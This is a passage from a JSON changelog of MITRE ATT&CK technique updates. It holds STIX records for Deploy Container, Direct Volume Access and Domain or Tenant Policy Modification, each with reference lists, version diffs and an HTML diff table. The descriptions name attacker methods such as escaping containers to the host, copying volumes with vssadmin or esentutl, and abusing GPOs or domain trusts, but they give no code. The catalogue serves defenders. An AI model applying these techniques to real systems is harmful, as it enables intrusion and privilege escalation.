                            "description": "The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.",
                            "url": "https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/"
                        },
                        {
                            "source_name": "Kubernetes Dashboard",
                            "description": "The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.",
                            "url": "https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Alfredo Oliveira, Trend Micro",
                        "Ariel Shuper, Cisco",
                        "Center for Threat-Informed Defense (CTID)",
                        "Idan Frimark, Cisco",
                        "Joas Antonio dos Santos, @C0d3Cr4zy",
                        "Magno Logan, @magnologan, Trend Micro",
                        "Pawan Kinger, @kingerpawan, Trend Micro",
                        "Vishwas Manral, McAfee",
                        "Yossi Weizman, Azure Defender Research Team"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:59:11.024000+00:00\", \"old_value\": \"2025-10-24 17:48:49.017000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\\n\\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Container)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)\", \"old_value\": \"Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\\n\\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\\n \\n-Containers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)\\n+Containers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Container)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"Docker Container\", \"old_value\": \"Docker Containers API\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"DockerDocs. (n.d.). Retrieved December 8, 2025.\", \"old_value\": \"Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://docs.docker.com/reference/cli/docker/container/create/\", \"old_value\": \"https://docs.docker.com/engine/api/v1.41/#tag/Container\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to35__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to35__0\"><a href=\"#difflib_chg_to35__top\">t</a></td><td class=\"diff_header\" id=\"from35_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;deploy&nbsp;a&nbsp;container&nbsp;into&nbsp;an&nbsp;environment&nbsp;to&nbsp;fa</td><td class=\"diff_next\"><a href=\"#difflib_chg_to35__top\">t</a></td><td class=\"diff_header\" id=\"to35_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;deploy&nbsp;a&nbsp;container&nbsp;into&nbsp;an&nbsp;environment&nbsp;to&nbsp;fa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cilitate&nbsp;execution&nbsp;or&nbsp;evade&nbsp;defenses.&nbsp;In&nbsp;some&nbsp;cases,&nbsp;adversa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cilitate&nbsp;execution&nbsp;or&nbsp;evade&nbsp;defenses.&nbsp;In&nbsp;some&nbsp;cases,&nbsp;adversa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ries&nbsp;may&nbsp;deploy&nbsp;a&nbsp;new&nbsp;container&nbsp;to&nbsp;execute&nbsp;processes&nbsp;associa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ries&nbsp;may&nbsp;deploy&nbsp;a&nbsp;new&nbsp;container&nbsp;to&nbsp;execute&nbsp;processes&nbsp;associa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ted&nbsp;with&nbsp;a&nbsp;particular&nbsp;image&nbsp;or&nbsp;deployment,&nbsp;such&nbsp;as&nbsp;processes</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ted&nbsp;with&nbsp;a&nbsp;particular&nbsp;image&nbsp;or&nbsp;deployment,&nbsp;such&nbsp;as&nbsp;processes</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;execute&nbsp;or&nbsp;download&nbsp;malware.&nbsp;In&nbsp;others,&nbsp;an&nbsp;adversary&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;execute&nbsp;or&nbsp;download&nbsp;malware.&nbsp;In&nbsp;others,&nbsp;an&nbsp;adversary&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;deploy&nbsp;a&nbsp;new&nbsp;container&nbsp;configured&nbsp;without&nbsp;network&nbsp;rules,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;deploy&nbsp;a&nbsp;new&nbsp;container&nbsp;configured&nbsp;without&nbsp;network&nbsp;rules,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">user&nbsp;limitations,&nbsp;etc.&nbsp;to&nbsp;bypass&nbsp;existing&nbsp;defenses&nbsp;within&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">user&nbsp;limitations,&nbsp;etc.&nbsp;to&nbsp;bypass&nbsp;existing&nbsp;defenses&nbsp;within&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;environment.&nbsp;In&nbsp;Kubernetes&nbsp;environments,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;environment.&nbsp;In&nbsp;Kubernetes&nbsp;environments,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attempt&nbsp;to&nbsp;deploy&nbsp;a&nbsp;privileged&nbsp;or&nbsp;vulnerable&nbsp;container&nbsp;into&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attempt&nbsp;to&nbsp;deploy&nbsp;a&nbsp;privileged&nbsp;or&nbsp;vulnerable&nbsp;container&nbsp;into&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;specific&nbsp;node&nbsp;in&nbsp;order&nbsp;to&nbsp;[Escape&nbsp;to&nbsp;Host](https://attack.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;specific&nbsp;node&nbsp;in&nbsp;order&nbsp;to&nbsp;[Escape&nbsp;to&nbsp;Host](https://attack.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mitre.org/techniques/T1611)&nbsp;and&nbsp;access&nbsp;other&nbsp;containers&nbsp;runn</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mitre.org/techniques/T1611)&nbsp;and&nbsp;access&nbsp;other&nbsp;containers&nbsp;runn</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;on&nbsp;the&nbsp;node.&nbsp;(Citation:&nbsp;AppSecco&nbsp;Kubernetes&nbsp;Namespace&nbsp;Br</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;on&nbsp;the&nbsp;node.&nbsp;(Citation:&nbsp;AppSecco&nbsp;Kubernetes&nbsp;Namespace&nbsp;Br</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eakout&nbsp;2020)&nbsp;&nbsp;Containers&nbsp;can&nbsp;be&nbsp;deployed&nbsp;by&nbsp;various&nbsp;means,&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eakout&nbsp;2020)&nbsp;&nbsp;Containers&nbsp;can&nbsp;be&nbsp;deployed&nbsp;by&nbsp;various&nbsp;means,&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uch&nbsp;as&nbsp;via&nbsp;Docker's&nbsp;&lt;code&gt;create&lt;/code&gt;&nbsp;and&nbsp;&lt;code&gt;start&lt;/cod</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uch&nbsp;as&nbsp;via&nbsp;Docker's&nbsp;&lt;code&gt;create&lt;/code&gt;&nbsp;and&nbsp;&lt;code&gt;start&lt;/cod</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&gt;&nbsp;APIs&nbsp;or&nbsp;via&nbsp;a&nbsp;web&nbsp;application&nbsp;such&nbsp;as&nbsp;the&nbsp;Kubernetes&nbsp;dash</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&gt;&nbsp;APIs&nbsp;or&nbsp;via&nbsp;a&nbsp;web&nbsp;application&nbsp;such&nbsp;as&nbsp;the&nbsp;Kubernetes&nbsp;dash</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">board&nbsp;or&nbsp;Kubeflow.&nbsp;(Citation:&nbsp;Docker&nbsp;Container<span class=\"diff_sub\">s&nbsp;API</span>)(Citatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">board&nbsp;or&nbsp;Kubeflow.&nbsp;(Citation:&nbsp;Docker&nbsp;Container)(Citation:&nbsp;Ku</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Kubernetes&nbsp;Dashboard)(Citation:&nbsp;Kubeflow&nbsp;Pipelines)&nbsp;In&nbsp;Ku</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">bernetes&nbsp;Dashboard)(Citation:&nbsp;Kubeflow&nbsp;Pipelines)&nbsp;In&nbsp;Kuberne</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">bernetes&nbsp;environments,&nbsp;containers&nbsp;may&nbsp;be&nbsp;deployed&nbsp;through&nbsp;wo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tes&nbsp;environments,&nbsp;containers&nbsp;may&nbsp;be&nbsp;deployed&nbsp;through&nbsp;workloa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rkloads&nbsp;such&nbsp;as&nbsp;ReplicaSets&nbsp;or&nbsp;DaemonSets,&nbsp;which&nbsp;can&nbsp;allow&nbsp;c</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ds&nbsp;such&nbsp;as&nbsp;ReplicaSets&nbsp;or&nbsp;DaemonSets,&nbsp;which&nbsp;can&nbsp;allow&nbsp;contai</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ontainers&nbsp;to&nbsp;be&nbsp;deployed&nbsp;across&nbsp;multiple&nbsp;nodes.(Citation:&nbsp;Ku</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ners&nbsp;to&nbsp;be&nbsp;deployed&nbsp;across&nbsp;multiple&nbsp;nodes.(Citation:&nbsp;Kuberne</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">bernetes&nbsp;Workload&nbsp;Management)&nbsp;Adversaries&nbsp;may&nbsp;deploy&nbsp;contain</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tes&nbsp;Workload&nbsp;Management)&nbsp;Adversaries&nbsp;may&nbsp;deploy&nbsp;containers&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ers&nbsp;based&nbsp;on&nbsp;retrieved&nbsp;or&nbsp;built&nbsp;malicious&nbsp;images&nbsp;or&nbsp;from&nbsp;ben</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ased&nbsp;on&nbsp;retrieved&nbsp;or&nbsp;built&nbsp;malicious&nbsp;images&nbsp;or&nbsp;from&nbsp;benign&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ign&nbsp;images&nbsp;that&nbsp;download&nbsp;and&nbsp;execute&nbsp;malicious&nbsp;payloads&nbsp;at&nbsp;r</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mages&nbsp;that&nbsp;download&nbsp;and&nbsp;execute&nbsp;malicious&nbsp;payloads&nbsp;at&nbsp;runtim</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">untime.(Citation:&nbsp;Aqua&nbsp;Build&nbsp;Images&nbsp;on&nbsp;Hosts)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.(Citation:&nbsp;Aqua&nbsp;Build&nbsp;Images&nbsp;on&nbsp;Hosts)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1030: Network Segmentation",
                            "M1035: Limit Access to Resource Over Network",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0249: Behavior-chain detection for T1610 Deploy Container across Docker & Kubernetes control/node planes"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:20.934000+00:00",
                    "modified": "2026-04-15 19:59:05.018000+00:00",
                    "name": "Direct Volume Access",
                    "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1006",
                            "external_id": "T1006"
                        },
                        {
                            "source_name": "Github PowerSploit Ninjacopy",
                            "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.",
                            "url": "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1"
                        },
                        {
                            "source_name": "Hakobyan 2009",
                            "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.",
                            "url": "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin"
                        },
                        {
                            "source_name": "LOLBAS Esentutl",
                            "description": "LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Tom Simpson, CrowdStrike Falcon OverWatch"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:59:05.018000+00:00\", \"old_value\": \"2025-10-24 17:48:23.015000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.3\"}}}",
                    "previous_version": "2.3",
                    "version_change": "2.3 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0426: Detection of Direct Volume Access for File System Evasion"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-03-07 14:10:32.650000+00:00",
                    "modified": "2026-04-16 20:07:53.114000+00:00",
                    "name": "Domain or Tenant Policy Modification",
                    "description": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.\n\nModifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.\n\nWith sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:  \n\n* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to  forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)\n* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)\n\nAdversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1484",
                            "external_id": "T1484"
                        },
                        {
                            "source_name": "ADSecurity GPO Persistence 2016",
                            "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.",
                            "url": "https://adsecurity.org/?p=2716"
                        },
                        {
                            "source_name": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks",
                            "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.",
                            "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"
                        },
                        {
                            "source_name": "Okta Cross-Tenant Impersonation 2023",
                            "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.",
                            "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"
                        },
                        {
                            "source_name": "Wald0 Guide to GPOs",
                            "description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019.",
                            "url": "https://wald0.com/?p=179"
                        },
                        {
                            "source_name": "Harmj0y Abusing GPO Permissions",
                            "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024.",
                            "url": "https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Obsidian Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Identity Provider"
                    ],
                    "x_mitre_version": "4.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.114000+00:00\", \"old_value\": \"2025-10-24 17:49:33.897000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"4.0\", \"old_value\": \"3.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"CISA SolarWinds Cloud Detection\", \"description\": \"CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.\", \"url\": \"https://us-cert.cisa.gov/ncas/alerts/aa21-008a\"}, \"root['external_references'][3]\": {\"source_name\": \"Microsoft 365 Defender Solorigate\", \"description\": \"Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.\", \"url\": \"https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/\"}, \"root['external_references'][4]\": {\"source_name\": \"Microsoft - Azure Sentinel ADFSDomainTrustMods\", \"description\": \"Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.\", \"url\": \"https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml\"}, \"root['external_references'][5]\": {\"source_name\": \"Microsoft - Update or Repair Federated domain\", \"description\": \"Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365\"}, \"root['external_references'][10]\": {\"source_name\": \"Sygnia Golden SAML\", \"description\": \"Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024.\", \"url\": \"https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/\"}}}",
                    "previous_version": "3.2",
                    "version_change": "3.2 \u2192 4.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0270: Detection of Domain or Tenant Policy Modifications via AD and Identity Provider"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-12-28 21:50:59.844000+00:00",
                    "modified": "2026-04-16 20:07:52.883000+00:00",
                    "name": "Group Policy Modification",
